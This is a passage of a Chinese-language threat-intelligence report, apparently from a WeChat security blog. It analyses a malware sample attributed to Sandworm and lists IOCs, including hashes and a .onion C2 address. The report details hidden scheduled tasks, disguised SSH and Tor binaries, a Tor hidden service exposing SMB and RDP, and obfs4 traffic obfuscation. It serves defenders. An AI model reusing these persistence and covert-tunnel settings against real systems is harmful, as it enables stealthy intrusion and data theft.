YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">此外，为了确保恶意载荷的隐蔽性与运行稳定性，配置文件启用了一系列激进的设置。任务被标记为</span><hidden><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">true</span></hidden><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，使其在任务计划程序的默认UI视图中不可见，以此逃避管理员的常规检查。同时，配置极大地放宽了运行限制：</span><executiontimelimit><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">PT0S</span></executiontimelimit><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">将执行时限设为 0（即无限制），允许恶意进程无限期常驻后台；而</span><disallowstartifonbatteries><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">false</span></disallowstartifonbatteries><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">与</span><stopifgoingonbatteries><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">false</span></stopifgoingonbatteries><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">则强制任务即使在笔记本电脑未连接电源的电池模式下也能启动且不被系统终止，绕过了常规的电源节能策略。</span><o:page></o:page></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">最后，通过传递参数 --headless，攻击者指示conhost在不创建任何可见窗口的情况下启动目标程序。被启动的二进制文件operagx.exe和dropbox.exe分别伪装成合法的Opera GX浏览器和Dropbox 云盘进程，实际上是SSH服务端和Tor服务端。此外，启动参数 -f statePointer 和 -f statusMap 进一步指定了软件运行所需的特定配置文件，确保了攻击组件按预定逻辑加载并建立连接。</span></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">3）SSH与TOR配置文件分析</span></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">下图分别是Tor客户端与SSH客户端配置</span></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;text-align: center;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25443037974683547" data-s="300,640" data-type="png" data-w="790" style="width: 100%;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/Emmib7pWXrXKJHnOAGoDdydkibR4a32ONGqK5V0nrefFbKF3rK6u9eT8MSZAP7RYzsyJuHGf0cUSiaE4mR2kFpbvftpnVMQf8w1A3ysrMwjmEw/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="250" data-cropsely2="236" data-backw="250" data-backh="64" data-imgfileid="100024780" src="https://wechat2rss.xlab.app/img-proxy/?k=78ebca0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXKJHnOAGoDdydkibR4a32ONGqK5V0nrefFbKF3rK6u9eT8MSZAP7RYzsyJuHGf0cUSiaE4mR2kFpbvftpnVMQf8w1A3ysrMwjmEw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">a. SSH 服务端配置 (statePointer)：构建隐蔽内网后门</span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">statePointer是一个经过自定义的OpenSSH服务端配置文件，配合伪装成operagx.exe 的 SSHD程序运行。该配置文件的核心策略是“隐蔽监听”：服务被强制绑定在本地回环地址127.0.0.1的非标准高位端口20321上。这意味着该SSH服务不直接对公网开放，防火墙无法从外部扫描到该端口，仅接受来自本机Tor隧道的流量。在身份验证方面，配置明确禁用了密码登录 (PasswordAuthentication no) ，并指定 AppData\Roaming\outlook\indexWeight 为公钥文件(AuthorizedKeysFile)，确保只有持有特定私钥的攻击者才能访问，有效防止了暴力破解和管理员的偶然发现。此外，攻击者还对文件传输功能进行了进程伪装，将SFTP子系统指向名为obsstudio.exe的程序 ，使其在进程列表中看起来像是OBS直播推流软件，从而混淆视听。</span><o:page></o:page></p><p style="text-indent: 0px;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">b. Tor隐藏服务配置 (statusMap)：打通暗网穿透隧道</span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">statusMap是标准的Tor客户端配置文件(torrc)，配合伪装成dropbox.exe的Tor程序使用，其目的是将受害主机的本地服务暴露给暗网。配置首先指定HiddenServiceDir 为 &#34;exceptionTag/&#34; ，Tor启动后会在此目录生成私钥和 .onion域名，确立受害主机的暗网身份。随后，攻击者定义了一组精密的“端口映射矩阵”，将Tor网络的虚拟端口流量转发至本地敏感端口：外部访问Tor的20322端口被直接导向本地的SSH服务（20321），构成了主要的控制通道；同时，配置还暴露了Windows的SMB端口 (445映射为11435)和RDP远程桌面端口(3389 映射为13893) ，这表明攻击者意图进行文件窃取、横向移动甚至获取完全的图形化控制权。此外，配置中还包含 12192 和 14763 等非标准端口的映射 ，为后续攻击预留的端口。为了进一步隐藏踪迹，Tor的运行数据目录被命名为opera，试图伪装成浏览器缓存数据。</span><o:page></o:page></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">攻击者通过SSH与TOR隧道相互配合，可以在受害者核心网络中建立一个永久、匿名、加密、且能全权远程控制的“影子管理台”，以达到窃取敏感信息的目的。</span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">三、逃避与混淆技术</span></span></strong></p></div></div></div></div></div><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">APT-C-13组织针对受害者网络环境中的流量审查、IP封锁等情况也做出了考量，下图是Tor在运行时加载的网桥配置文件。</span></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.21530758226037197" data-w="1398" style="width: 553.74px;height: 119.2px;" src="https://wechat2rss.xlab.app/img-proxy/?k=2eba1788&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIZtyHDn0xTGaCKKtgus7XIvbibfvSURuNsNHHZTHSjfKcGh6L8CW0dybnyb7Uxn4WNNQlkOKCzygw1sUJj5zdJO5jfGKibK0FHY%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Tor网络连接启用强制混淆网桥（Obfuscated Bridges）接入机制，而非直接连接公开的Tor入口节点。这种配置策略表明攻击者对目标网络环境有明确的预判，预置了对抗网络封锁的手段。在技术实现上，该配置启用了obfs4混淆协议。通过配置文件中的指令，恶意软件调用了伪装成safari.exe的插件程序（实为obfs4proxy）来处理所有出站流量。obfs4协议能够剥离Tor流量中典型的加密指纹特征，将其重塑为在统计学上看似完全随机的无意义TCP数据流。</span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">这一机制是恶意软件实现深度防御规避的关键。通过</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">混淆流量</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">，攻击者可成功绕过企业级防火墙和国网络审查系统的深度包检测（DPI）审计。无论目标网络是否存在流量白名单或协议阻断策略，该配置都能极大提高通信的生存率，确保受害主机与暗网C2服务器之间的控制通道畅通无阻，实现持续性的隐蔽控制。</span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">四、归属研判</span></span></strong></p></div></div></div></div></div><p style="text-indent: 2em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">根据对该样本及其执行链路的溯源分析，</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">我们较有把握判定此次攻击活动与Sandworm组织存在关联。首先，恶意载荷伪装成Outlook组件，以及创建计划任务的方法与Sandworm组织历史攻击模式类似。其次，攻击者采用了其标志性的“双层嵌套匿名隧道”架构，利用混淆后的obfs4网桥接入TOR隐蔽网络，并在其隧道内部嵌套SSH服务，实现对受害机445与3389端口的匿名化映射，这种控制手段与境外应急响应机构发布的关于Sandworm组织文章</span><sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">[1]</span></sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">相似，不同在于公开样本采用NSIS打包，但设计思路一致，其中SSH和TOR的配置文件基本类似，只是从单一样本变成多个样本相互配合的模式，因此本次攻击行动可认为是之前攻击方式的升级。此外，相关公开分析文章</span><sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">[2]</span></sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">也认为这种攻击技术可能与Sandworm组织存在较强关联性。需特别指出的是，早期网络安全研究公司也曾将此类基于匿名隧道的攻击活动归因于具备强力境外国家背景的黑客组织</span><sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">[3]</span></sup><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">。最后，根据捕获的部分样本上传来自于东欧地区，伪装文件使用当地通用语言编写且内容与军事题材有关，结合区域安全态势综合研判，本次活动归属Sandworm组织的可信度较高。</span></p><div data-role="outer" style="margin: 0px;padding: 0px;box-sizing: border-box;"><div data-tools="135编辑器" data-id="101849" style="margin: 0px;padding: 0px;box-sizing: border-box;"><div style="margin: 10px 0px;padding: 0px;box-sizing: border-box;"><div style="margin: 0px 0px -15px;padding: 0px;display: flex;box-sizing:border-box;transform: rotate(0deg);-webkit-transform: rotate(0deg);-moz-transform: rotate(0deg);-o-transform: rotate(0deg);"><p data-brushtype="text" style="margin: 0px;padding: 0px 1em;color: #f2f2f2;line-height: 32px;height: 32px;font-size: 16px;background-color: #be191f;letter-spacing: 1.5px;box-sizing: border-box;"><strong style="margin: 0px;padding: 0px;"><span style="margin: 0px;padding: 0px;font-size: 17px;"><span leaf="">总结</span></span></strong></p></div><div style="margin: 0px 0px 0px 6px;padding: 30px 15px 10px;background-color: #f2f2f2;flex-shrink: 0;box-sizing: border-box;"><div data-autoskip="1" style="margin: 0px;padding: 0px;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;box-sizing: border-box;"><div style="margin: 0px;padding: 0px;text-indent: 2em;box-sizing: border-box;"><p style="margin-top: 8px;margin-bottom: 8px;display: block;"><span style="color: #333333;text-align: justify;text-indent: 28px;text-decoration-thickness: initial;font-size: 17px;display: inline !important;font-family:仿宋;" data-mpa-action-id="mo888xtg1qdb" data-pm-slice="0 0 []"><span mpa-font-style="mo888xt1axm" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">本次发现的APT-C-13（Sandworm)攻击载荷展现了该组织在隐匿通信与持久化战术上的显著迭代与升级，其核心技术路径已由早期的单一木马回连全面转向多个文件协调配合的趋势。此外，在通道构建上通过引入obfs4混淆协议伪装Tor流量，并嵌套具有公钥认证功能的SSH服务端，将受害机内网的SMB与RDP服务直接映射至暗网Onion域名，这种架构颠覆了传统的边界防御模型，标志着该组织其武器库已从基础渗透进化为一种高度专业化、具备全球远程管控能力的匿名运维体系。</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;style&#34;:&#34;margin: 0px;padding: 0px;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;101849&#34;,&#34;style&#34;:&#34;margin: 0px;padding: 0px;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px 0px;padding: 0px;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 0px 0px 0px 6px;padding: 30px 15px 10px;background-color: #f2f2f2;flex-shrink: 0;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-autoskip&#34;:&#34;1&#34;,&#34;style&#34;:&#34;margin: 0px;padding: 0px;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 0px;padding: 0px;text-indent: 2em;box-sizing: border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">此外本文披露的样本只是该组织攻击过程中使用的部分载荷，通过对样本进行的深入分析，希望帮助用户了解此类攻击链条及防范手段。同时也提醒用户提高安全意识，在日常工作中谨慎处理未知压缩包、邮件附件和超链接，避免因轻信而在毫无防护的情况下遭受入侵，造成敏感信息和重要数据的泄露。</span></span></span></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="mo2lix40brc"><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="edit by 135editor" mpa-from-tpl="t"><div data-role="title" data-tools="135编辑器" data-id="85638" mpa-from-tpl="t"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);" mpa-from-tpl="t"><p style="margin-top: -1.2em;text-align: center;border: none;line-height: 1.4;" mpa-from-tpl="t"><strong mpa-from-tpl="t"><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">附录 IOC</span></span></strong></p></div></div></div></div></div><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;font-weight: bold;">MD5:</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">09f402a02b615dcd14786aaa840db0a2</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">1b39fce74193dd2cd5c36b2f8b626273</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">2156c270ffe8e4b23b67efed191b9737</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">a6d095dc0e01f97db7e74cb5bed402dc</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">53ac08488544ad1fefd6363db44549cf</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">227b3fa386cad73f0f388d801060e2c8</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">0b6f7356919b9632c1158681ee0462f3</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">4d5074d6e0722ceec45a083fa8444164 </span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">99732e49668e56527963742922277459</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">6616717dfb2a795113b47d862c5412e2</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">5db8e71b8e82661408f96b43e7ae8faf</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;line-height: 1.6em;"><span leaf=""><span textstyle="" style="font-size: 15px;">487557c9b7288a6b035911a7652ad57c</span></span></p><p style="line-height: 1.6em;margin-bottom: 8px;margin-top: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;font-weight: bold;">C2: </span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">kvk46su7d2qi6g4n43syp4zbsf2rihnc6ztj77qtc2ojvewjqvqilnqd.onion</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: 